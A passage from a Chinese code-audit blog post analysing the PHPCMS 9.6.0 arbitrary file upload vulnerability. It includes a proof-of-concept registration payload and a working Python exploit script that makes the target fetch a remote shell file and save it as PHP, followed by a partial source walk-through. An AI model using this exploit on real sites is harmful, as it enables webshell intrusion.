<!DOCTYPE html><html lang="en" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width,initial-scale=1"><title>代码审计之PHPCMS_V9.6.0任意文件上传漏洞分析 | Tao's blog</title><meta name="keywords" content="PHP代码审计"><meta name="author" content="Bobtaoy"><meta name="copyright" content="Bobtaoy"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#ffffff"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><meta name="description" content="PHPCMS_V9.6.0任意文件上传漏洞分析前言PHPCMS是一款网站管理软件。该软件采用模块化开发,支持多种分类方式。 环境搭建本次PHPCMS版本为9.6.0,安装步骤跟上一篇文章一样，参考PHPCMS_V9.2任意文件上传getshell漏洞分析 漏洞复现在注册用户处，添加用户进行抓包（这里以Tao为例）  123#pocsiteid&#x3D;1&amp;modelid&#x3D;11&amp;userna">
<meta property="og:type" content="article">
<meta property="og:title" content="代码审计之PHPCMS_V9.6.0任意文件上传漏洞分析">
<meta property="og:url" content="https://bobtaoy.github.io/2021/02/07/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E4%B9%8BPHPCMSV9-6-%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/index.html">
<meta property="og:site_name" content="Tao&#39;s blog">
<meta property="og:description" content="PHPCMS_V9.6.0任意文件上传漏洞分析前言PHPCMS是一款网站管理软件。该软件采用模块化开发,支持多种分类方式。 环境搭建本次PHPCMS版本为9.6.0,安装步骤跟上一篇文章一样，参考PHPCMS_V9.2任意文件上传getshell漏洞分析 漏洞复现在注册用户处，添加用户进行抓包（这里以Tao为例）  123#pocsiteid&#x3D;1&amp;modelid&#x3D;11&amp;userna">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://w.wallhaven.cc/full/n6/wallhaven-n6kde7.jpg">
<meta property="article:published_time" content="2021-02-07T01:39:31.000Z">
<meta property="article:modified_time" content="2021-03-16T02:37:01.309Z">
<meta property="article:author" content="Bobtaoy">
<meta property="article:tag" content="PHP代码审计">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://w.wallhaven.cc/full/n6/wallhaven-n6kde7.jpg"><link rel="shortcut icon" href="/img/favicon.png"><link rel="canonical" href="https://bobtaoy.github.io/2021/02/07/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E4%B9%8BPHPCMSV9-6-%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free/css/all.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/node-snackbar/dist/snackbar.min.css"><script>var GLOBAL_CONFIG = { 
  root: '/',
  hexoversion: '5.2.0',
  algolia: undefined,
  localSearch: undefined,
  translate: undefined,
  noticeOutdate: undefined,
  highlight: {"plugin":"highlighjs","highlightCopy":true,"highlightLang":true},
  copy: {
    success: 'Copy successfully',
    error: 'Copy error',
    noSupport: 'The browser does not support'
  },
  relativeDate: {
    homepage: false,
    post: false
  },
  runtime: 'days',
  date_suffix: {
    just: 'Just',
    min: 'minutes ago',
    hour: 'hours ago',
    day: 'days ago',
    month: 'months ago'
  },
  copyright: undefined,
  ClickShowText: undefined,
  lightbox: 'fancybox',
  Snackbar: {"chs_to_cht":"Traditional Chinese Activated Manually","cht_to_chs":"Simplified Chinese Activated Manually","day_to_night":"Dark Mode Activated Manually","night_to_day":"Light Mode Activated Manually","bgLight":"#49b1f5","bgDark":"#121212","position":"bottom-left"},
  justifiedGallery: {
    js: 'https://cdn.jsdelivr.net/npm/justifiedGallery/dist/js/jquery.justifiedGallery.min.js',
    css: 'https://cdn.jsdelivr.net/npm/justifiedGallery/dist/css/justifiedGallery.min.css'
  },
  isPhotoFigcaption: false,
  islazyload: false,
  isanchor: false
};

var saveToLocal = {
  set: function setWithExpiry(key, value, ttl) {
    const now = new Date()
    const expiryDay = ttl * 86400000
    const item = {
      value: value,
      expiry: now.getTime() + expiryDay,
    }
    localStorage.setItem(key, JSON.stringify(item))
  },

  get: function getWithExpiry(key) {
    const itemStr = localStorage.getItem(key)

    if (!itemStr) {
      return undefined
    }
    const item = JSON.parse(itemStr)
    const now = new Date()

    if (now.getTime() > item.expiry) {
      localStorage.removeItem(key)
      return undefined
    }
    return item.value
  }
}</script><script id="config_change">var GLOBAL_CONFIG_SITE = { 
  isPost: true,
  isHome: false,
  isHighlightShrink: false,
  isSidebar: true,
  postUpdate: '2021-03-16 10:37:01'
}</script><noscript><style type="text/css">
  #nav {
    opacity: 1
  }
  .justified-gallery img {
    opacity: 1
  }

  #recent-posts time,
  #post-meta time {
    display: inline !important
  }
</style></noscript><script>(function () {
  window.activateDarkMode = function () {
    document.documentElement.setAttribute('data-theme', 'dark')
    if (document.querySelector('meta[name="theme-color"]') !== null) {
      document.querySelector('meta[name="theme-color"]').setAttribute('content', '#0d0d0d')
    }
  }
  window.activateLightMode = function () {
    document.documentElement.setAttribute('data-theme', 'light')
    if (document.querySelector('meta[name="theme-color"]') !== null) {
      document.querySelector('meta[name="theme-color"]').setAttribute('content', '#ffffff')
    }
  }

  const autoChangeMode = 'false'
  const t = saveToLocal.get('theme')
  if (autoChangeMode === '1') {
    const isDarkMode = window.matchMedia('(prefers-color-scheme: dark)').matches
    const isLightMode = window.matchMedia('(prefers-color-scheme: light)').matches
    const isNotSpecified = window.matchMedia('(prefers-color-scheme: no-preference)').matches
    const hasNoSupport = !isDarkMode && !isLightMode && !isNotSpecified

    if (t === undefined) {
      if (isLightMode) activateLightMode()
      else if (isDarkMode) activateDarkMode()
      else if (isNotSpecified || hasNoSupport) {
        const now = new Date()
        const hour = now.getHours()
        const isNight = hour <= 6 || hour >= 18
        isNight ? activateDarkMode() : activateLightMode()
      }
      window.matchMedia('(prefers-color-scheme: dark)').addListener(function (e) {
        if (saveToLocal.get('theme') === undefined) {
          e.matches ? activateDarkMode() : activateLightMode()
        }
      })
    } else if (t === 'light') activateLightMode()
    else activateDarkMode()
  } else if (autoChangeMode === '2') {
    const now = new Date()
    const hour = now.getHours()
    const isNight = hour <= 6 || hour >= 18
    if (t === undefined) isNight ? activateDarkMode() : activateLightMode()
    else if (t === 'light') activateLightMode()
    else activateDarkMode()
  } else {
    if (t === 'dark') activateDarkMode()
    else if (t === 'light') activateLightMode()
  }
})()</script><meta name="generator" content="Hexo 5.2.0"><link rel="alternate" href="/atom.xml" title="Tao's blog" type="application/atom+xml">
</head><body><div id="mobile-sidebar"><div id="menu_mask"></div><div id="mobile-sidebar-menus"><div class="mobile_author_icon"><img class="avatar-img" src="/img/avatar.png" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"/></div><div class="mobile_post_data"><div class="mobile_data_item is-center"><div class="mobile_data_link"><a href="/archives/"><div class="headline">Articles</div><div class="length_num">26</div></a></div></div><div class="mobile_data_item is-center">      <div class="mobile_data_link"><a href="/tags/"><div class="headline">Tags</div><div class="length_num">9</div></a></div></div><div class="mobile_data_item is-center">     <div class="mobile_data_link"><a href="/categories/"><div class="headline">Categories</div><div class="length_num">7</div></a></div></div></div><hr/><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><span> Home</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><span> Archives</span></a></div><div class="menus_item"><a class="site-page" href="/friends-link/"><span> Link</span></a></div><div class="menus_item"><a class="site-page" href="/read/"><span> Read</span></a></div></div></div></div><div id="body-wrap"><div id="sidebar"><i class="fas fa-arrow-right on" id="toggle-sidebar"></i><div class="sidebar-toc"><div class="sidebar-toc__title">Catalog</div><div class="sidebar-toc__progress"><span class="progress-notice">You've read</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar">     </div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#PHPCMS-V9-6-0%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90"><span class="toc-number">1.</span> <span class="toc-text">PHPCMS_V9.6.0任意文件上传漏洞分析</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%89%8D%E8%A8%80"><span class="toc-number">1.1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA"><span class="toc-number">1.2.</span> <span class="toc-text">环境搭建</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0"><span class="toc-number">1.3.</span> <span class="toc-text">漏洞复现</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90"><span class="toc-number">1.4.</span> <span class="toc-text">漏洞分析</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E4%BF%AE%E5%A4%8D"><span class="toc-number">1.5.</span> <span class="toc-text">漏洞修复</span></a></li></ol></li></ol></div></div></div><header class="post-bg" id="page-header" style="background-image: url(https://w.wallhaven.cc/full/n6/wallhaven-n6kde7.jpg)"><nav id="nav"><span id="blog_name"><a id="site-name" href="/">Tao's blog</a></span><span id="menus"><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><span> Home</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><span> Archives</span></a></div><div class="menus_item"><a class="site-page" href="/friends-link/"><span> Link</span></a></div><div class="menus_item"><a class="site-page" href="/read/"><span> Read</span></a></div></div><span class="close" id="toggle-menu"><a class="site-page"><i class="fas fa-bars fa-fw"></i></a></span></span></nav><div id="post-info"><div id="post-title"><div class="posttitle">代码审计之PHPCMS_V9.6.0任意文件上传漏洞分析</div></div><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="far fa-calendar-alt fa-fw post-meta-icon"></i><span class="post-meta-label">Created</span><time class="post-meta-date-created" datetime="2021-02-07T01:39:31.000Z" title="Created 2021-02-07 09:39:31">2021-02-07</time><span class="post-meta-separator">|</span><i class="fas fa-history fa-fw post-meta-icon"></i><span class="post-meta-label">Updated</span><time class="post-meta-date-updated" datetime="2021-03-16T02:37:01.309Z" title="Updated 2021-03-16 10:37:01">2021-03-16</time></span><span class="post-meta-categories"><span class="post-meta-separator">|</span><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/PHP/">PHP</a><i class="fas fa-angle-right post-meta-separator"></i><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/PHP/web%E5%AE%89%E5%85%A8/">web安全</a><i class="fas fa-angle-right post-meta-separator"></i><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/PHP/web%E5%AE%89%E5%85%A8/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/">代码审计</a></span></div><div class="meta-secondline"> <span class="post-meta-separator">|</span><span class="post-meta-pv-cv"><i class="far fa-eye fa-fw post-meta-icon"></i><span class="post-meta-label">Post View:</span><span id="busuanzi_value_page_pv"></span></span></div></div></div></header><main class="layout_post" id="content-inner"><article id="post"><div class="post-content" id="article-container"><h1 id="PHPCMS-V9-6-0任意文件上传漏洞分析"><a href="#PHPCMS-V9-6-0任意文件上传漏洞分析" class="headerlink" title="PHPCMS_V9.6.0任意文件上传漏洞分析"></a>PHPCMS_V9.6.0任意文件上传漏洞分析</h1><h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>PHPCMS是一款网站管理软件。该软件采用模块化开发,支持多种分类方式。</p>
<h2 id="环境搭建"><a href="#环境搭建" class="headerlink" title="环境搭建"></a>环境搭建</h2><p>本次PHPCMS版本为<code>9.6.0</code>,安装步骤跟上一篇文章一样，参考<a href="https://bobtaoy.github.io/2021/02/06/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E4%B9%8BPHPCMSV9-2%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/">PHPCMS_V9.2任意文件上传getshell漏洞分析</a></p>
<h2 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="漏洞复现"></a>漏洞复现</h2><p>在注册用户处，添加用户进行抓包（这里以Tao为例）</p>
<p><img src="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20210313203000959.png" alt="image-20210313203000959"></p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#poc</span></span><br><span class="line">siteid=<span class="number">1</span>&amp;modelid=<span class="number">11</span>&amp;username=Tao&amp;password=<span class="number">123456</span>&amp;email=Tao@qq.com&amp;info[<span class="type">content</span>]=&lt;img src=http://www.tao.com/t.txt?.php<span class="comment">#.jpg&gt;&amp;dosubmit=1&amp;protocol=</span></span><br><span class="line"><span class="comment"># http://www.tao.com/t.txt显示的内容为你要上传的文件内容</span></span><br></pre></td></tr></table></figure>

<p>本次测试中, <code>http://www.tao.com/t.txt</code>文本内容如下：</p>
<p><img src="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20210313203253414.png" alt="image-20210313203253414"></p>
<p>修改，放包回显如下，然后我们访问该返回的url</p>
<p><img src="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20210313203647323.png" alt="image-20210313203647323"></p>
<p><img src="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20210313203805927.png" alt="image-20210313203805927"></p>
<p>利用成功！！！这里再贴个脚本</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">version: python3</span></span><br><span class="line"><span class="string">Author: Tao</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"><span class="keyword">import</span> random</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">anyfile_up</span>(<span class="params">surl,url</span>):</span></span><br><span class="line">    url = <span class="string">&quot;&#123;&#125;/index.php?m=member&amp;c=index&amp;a=register&amp;siteid=1&quot;</span>.format(url)</span><br><span class="line">    data = &#123;</span><br><span class="line">        <span class="string">&#x27;siteid&#x27;</span>: <span class="string">&#x27;1&#x27;</span>,</span><br><span class="line">        <span class="string">&#x27;modelid&#x27;</span>: <span class="string">&#x27;1&#x27;</span>,</span><br><span class="line">        <span class="string">&#x27;username&#x27;</span>: <span class="string">&#x27;Tao&#123;&#125;&#x27;</span>.format(random.randint(<span class="number">1</span>,<span class="number">9999</span>)),</span><br><span class="line">        <span class="string">&#x27;password&#x27;</span>: <span class="string">&#x27;123456&#x27;</span>,</span><br><span class="line">        <span class="string">&#x27;email&#x27;</span>: <span class="string">&#x27;Tao&#123;&#125;@xxx.com&#x27;</span>.format(random.randint(<span class="number">1</span>,<span class="number">9999</span>)),</span><br><span class="line">        <span class="string">&#x27;info[content]&#x27;</span>: <span class="string">&#x27;&lt;img src=&#123;&#125;?.php#.jpg&gt;&#x27;</span>.format(surl),</span><br><span class="line">        <span class="string">&#x27;dosubmit&#x27;</span>: <span class="string">&#x27;1&#x27;</span>,</span><br><span class="line">        <span class="string">&#x27;protocol&#x27;</span>: <span class="string">&#x27;&#x27;</span></span><br><span class="line">    &#125;</span><br><span class="line">    r = requests.post(url, data=data)</span><br><span class="line">    return_url = re.findall(<span class="string">r&#x27;img src=(.*)&amp;gt&#x27;</span>,r.text)</span><br><span class="line">    <span class="keyword">if</span> len(return_url):</span><br><span class="line">        <span class="keyword">return</span> return_url[<span class="number">0</span>]</span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">    <span class="keyword">if</span> len(sys.argv) == <span class="number">3</span>:</span><br><span class="line">        return_url = anyfile_up(sys.argv[<span class="number">1</span>],sys.argv[<span class="number">2</span>])</span><br><span class="line">        print(<span class="string">&#x27;seccess! upload file url: &#x27;</span>, return_url)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        message = \</span><br><span class="line">        <span class="string">&quot;&quot;&quot;</span></span><br><span class="line"><span class="string">        python3 anyfile_up.py [上传内容URL地址] [目标URL]</span></span><br><span class="line"><span class="string">        example: python3 anyfile_up.py http://www.tao.com/shell.txt http://www.phpcms96.com</span></span><br><span class="line"><span class="string">        &quot;&quot;&quot;</span></span><br><span class="line">        print(message)</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>运行效果如下图：</p>
<p><img src="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20210313210542652.png" alt="image-20210313210542652"></p>
<h2 id="漏洞分析"><a href="#漏洞分析" class="headerlink" title="漏洞分析"></a>漏洞分析</h2><p>这个漏洞存在于用户注册处，通过上面请求的地址（<code>/index.php?m=member&amp;c=index&amp;a=register&amp;siteid=1</code>）,定位处理请求的函数为<code>register</code>,位于文件<code>phpcms/modules/member/index.php</code>33行处。</p>
<p>为了更好的理解漏洞的原理和利用的巧妙之处，我们就先看看正常的注册流程。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 61-79</span></span><br><span class="line">$userinfo = <span class="keyword">array</span>();</span><br><span class="line">$userinfo[<span class="string">&#x27;encrypt&#x27;</span>] = create_randomstr(<span class="number">6</span>);</span><br><span class="line"></span><br><span class="line">$userinfo[<span class="string">&#x27;username&#x27;</span>] = (<span class="keyword">isset</span>($_POST[<span class="string">&#x27;username&#x27;</span>]) &amp;&amp; is_username($_POST[<span class="string">&#x27;username&#x27;</span>])) ? $_POST[<span class="string">&#x27;username&#x27;</span>] : <span class="keyword">exit</span>(<span class="string">&#x27;0&#x27;</span>);</span><br><span class="line">$userinfo[<span class="string">&#x27;nickname&#x27;</span>] = (<span class="keyword">isset</span>($_POST[<span class="string">&#x27;nickname&#x27;</span>]) &amp;&amp; is_username($_POST[<span class="string">&#x27;nickname&#x27;</span>])) ? $_POST[<span class="string">&#x27;nickname&#x27;</span>] : <span class="string">&#x27;&#x27;</span>;</span><br><span class="line"></span><br><span class="line">$userinfo[<span class="string">&#x27;email&#x27;</span>] = (<span class="keyword">isset</span>($_POST[<span class="string">&#x27;email&#x27;</span>]) &amp;&amp; is_email($_POST[<span class="string">&#x27;email&#x27;</span>])) ? $_POST[<span class="string">&#x27;email&#x27;</span>] : <span class="keyword">exit</span>(<span class="string">&#x27;0&#x27;</span>);</span><br><span class="line">$userinfo[<span class="string">&#x27;password&#x27;</span>] = (<span class="keyword">isset</span>($_POST[<span class="string">&#x27;password&#x27;</span>]) &amp;&amp; is_badword($_POST[<span class="string">&#x27;password&#x27;</span>])==<span class="literal">false</span>) ? $_POST[<span class="string">&#x27;password&#x27;</span>] : <span class="keyword">exit</span>(<span class="string">&#x27;0&#x27;</span>);</span><br><span class="line"></span><br><span class="line">$userinfo[<span class="string">&#x27;email&#x27;</span>] = (<span class="keyword">isset</span>($_POST[<span class="string">&#x27;email&#x27;</span>]) &amp;&amp; is_email($_POST[<span class="string">&#x27;email&#x27;</span>])) ? $_POST[<span class="string">&#x27;email&#x27;</span>] : <span class="keyword">exit</span>(<span class="string">&#x27;0&#x27;</span>);</span><br><span class="line"></span><br><span class="line">$userinfo[<span class="string">&#x27;modelid&#x27;</span>] = <span class="keyword">isset</span>($_POST[<span class="string">&#x27;modelid&#x27;</span>]) ? intval($_POST[<span class="string">&#x27;modelid&#x27;</span>]) : <span class="number">10</span>;</span><br><span class="line">$userinfo[<span class="string">&#x27;regip&#x27;</span>] = ip();</span><br><span class="line">$userinfo[<span class="string">&#x27;point&#x27;</span>] = $member_setting[<span class="string">&#x27;defualtpoint&#x27;</span>] ? $member_setting[<span class="string">&#x27;defualtpoint&#x27;</span>] : <span class="number">0</span>;</span><br><span class="line">$userinfo[<span class="string">&#x27;amount&#x27;</span>] = $member_setting[<span class="string">&#x27;defualtamount&#x27;</span>] ? $member_setting[<span class="string">&#x27;defualtamount&#x27;</span>] : <span class="number">0</span>;</span><br><span class="line">$userinfo[<span class="string">&#x27;regdate&#x27;</span>] = $userinfo[<span class="string">&#x27;lastdate&#x27;</span>] = SYS_TIME;</span><br><span class="line">$userinfo[<span class="string">&#x27;siteid&#x27;</span>] = $siteid;</span><br><span class="line">$userinfo[<span class="string">&#x27;connectid&#x27;</span>] = <span class="keyword">isset</span>($_SESSION[<span class="string">&#x27;connectid&#x27;</span>]) ? $_SESSION[<span class="string">&#x27;connectid&#x27;</span>] : <span class="string">&#x27;&#x27;</span>;</span><br><span class="line">$userinfo[<span class="string">&#x27;from&#x27;</span>] = <span class="keyword">isset</span>($_SESSION[<span class="string">&#x27;from&#x27;</span>]) ? $_SESSION[<span class="string">&#x27;from&#x27;</span>] : <span class="string">&#x27;&#x27;</span>;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>上面代码对用户信息进行了处理，130行前的代码就是获取一下信息，意义不大。直接下断点到130行，然后<code>F9</code>跳到此处，代码如下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>($member_setting[<span class="string">&#x27;choosemodel&#x27;</span>]) &#123;</span><br><span class="line">    <span class="keyword">require_once</span> CACHE_MODEL_PATH.<span class="string">&#x27;member_input.class.php&#x27;</span>;</span><br><span class="line">    <span class="keyword">require_once</span> CACHE_MODEL_PATH.<span class="string">&#x27;member_update.class.php&#x27;</span>;</span><br><span class="line">    $member_input = <span class="keyword">new</span> member_input($userinfo[<span class="string">&#x27;modelid&#x27;</span>]);		</span><br><span class="line">    $_POST[<span class="string">&#x27;info&#x27;</span>] = array_map(<span class="string">&#x27;new_html_special_chars&#x27;</span>,$_POST[<span class="string">&#x27;info&#x27;</span>]);</span><br><span class="line">    $user_model_info = $member_input-&gt;get($_POST[<span class="string">&#x27;info&#x27;</span>]);	<span class="comment">// 135行，重点</span></span><br></pre></td></tr></table></figure>

<p>走到135，可以发现，这里<code>$_POST[&#39;info&#39;]</code>传入了<code>member_input</code>类中的<code>get</code>方法，跟进该方法。(该方法跳转至：<code>/caches/caches_model/caches_data/member_input.class.php</code>文件20行)</p>
<p>继续执行可发现，在这个<code>get</code>方法中，走到47行，获取了<code>datetime</code>函数，而48行也调用了该函数。</p>
<blockquote>
<p>这里留一个问题，为什么47行处获取的是<code>datetime</code>这个函数？</p>
</blockquote>
<p><img src="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20210313215610842.png" alt="image-20210313215610842"></p>
<p>跟进一下这个函数，代码如下：</p>
<p><img src="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20210313220037379.png" alt="image-20210313220037379"></p>
<p>上面代码执行完以后，返回<code>$value=&quot;2021-03-13&quot;</code>,然后返回<code>get</code>方法，执行</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$info[$field] = $value;</span><br><span class="line"><span class="keyword">return</span> $info;</span><br></pre></td></tr></table></figure>

<p>退出<code>get</code>方法，继续跟进，进入<code>ps_member_register</code>方法</p>
<p><img src="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20210313220404057.png" alt="image-20210313220404057"></p>
<p>继续跟进，执行<code>insert</code>操作</p>
<p><img src="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20210313220718466.png" alt="image-20210313220718466"></p>
<p><code>F7</code>跟进,执行到下图，将注册信息插入数据库，注册完成。</p>
<p><img src="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20210313220855915.png" alt="image-20210313220855915"></p>
<p><img src="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20210314230547401.png" alt="image-20210314230547401"></p>
<p>之后返回到<code>register</code>函数</p>
<p><img src="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20210314230733721.png" alt="image-20210314230733721"></p>
<p>当<code>$status &gt; 0</code>时，执行<code>insert</code>操作，这里将<code>生日日期</code>和<code>用户id</code>插入到<code>v9_member_detail</code>表中</p>
<p><img src="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20210314230547401.png" alt="img26"></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">INSERT INTO `phpcmsv96`.`v9_member_detail`(`birthday`,`userid`) VALUES (<span class="string">&#x27;2021-03-13&#x27;</span>php,<span class="string">&#x27;26&#x27;</span>)</span><br></pre></td></tr></table></figure>

<p>到这里，我们肯定还是不知道为什么上面调用的函数是<code>datetime</code>,先不急，我们整理一下注册的执行流程：</p>
<p><img src="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20210313222051498.png" alt="image-20210313222051498"></p>
<p>你是不是发现了什么？,接下来我们来分析一下为什么<code>$func=&quot;datetime&quot;</code>。</p>
<p>首页由于<code>$func = $this-&gt;fields[$field][&#39;formtype&#39;]</code>，我们按ctrl点击<code>$this-&gt;fields</code>，同一文件，第11行得到的，这里传了个<code>&#39;model_field_&#39;.$modelid</code>, 而<code>$modelid = 10</code>，跟进一下<code>getcache</code>方法</p>
<p><img src="https://gitee.com/bobtaoi/md_img/raw/master/img/image-20210313223822786.png" alt="image-20210313223822786"></p>
<p>跳转至<code>phpsso_server/phpcms/libs/functions/global.func.php</code>文件，函数内容如下:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">getcache</span>(<span class="params">$name, $filepath=<span class="string">&#x27;&#x27;</span>, $type=<span class="string">&#x27;file&#x27;</span>, $config=<span class="string">&#x27;&#x27;</span></span>) </span>&#123;</span><br><span class="line">	<span class="keyword">if</span>(!preg_match(<span class="string">&quot;/^[a-zA-Z0-9_-]+$/&quot;</span>, $name)) <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">	<span class="keyword">if</span>($filepath!=<span class="string">&quot;&quot;</span> &amp;&amp; !preg_match(<span class="string">&quot;/^[a-zA-Z0-9_-]+$/&quot;</span>, $filepath)) <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">	pc_base::load_sys_class(<span class="string">&#x27;cache_factory&#x27;</span>,<span class="string">&#x27;&#x27;</span>,<span class="number">0</span>);</span><br><span class="line">	<span class="keyword">if</span>($config) &#123;</span><br><span class="line">		$cacheconfig = pc_base::load_config(<span class="string">&#x27;cache&#x27;</span>);</span><br><span class="line">		$cache = cache_factory::get_instance($cacheconfig)-&gt;get_cache($config);</span><br><span class="line">	&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">		$cache = cache_factory::get_instance()-&gt;get_cache($type);</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">return</span> $cache-&gt;get($name, <span class="string">&#x27;&#x27;</span>, <span class="string">&#x27;&#x27;</span>, $filepath);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>因为<code>$config</code>未进行传参，默认为空，因此执行的是<code>$cache = cache_factory::get_instance()-&gt;get_cache($type);</code>,执行<code>get_cahe</code>方法，传入参数<code>$type=&#39;file&#39;</code>, 跟进一下此方法：</p>
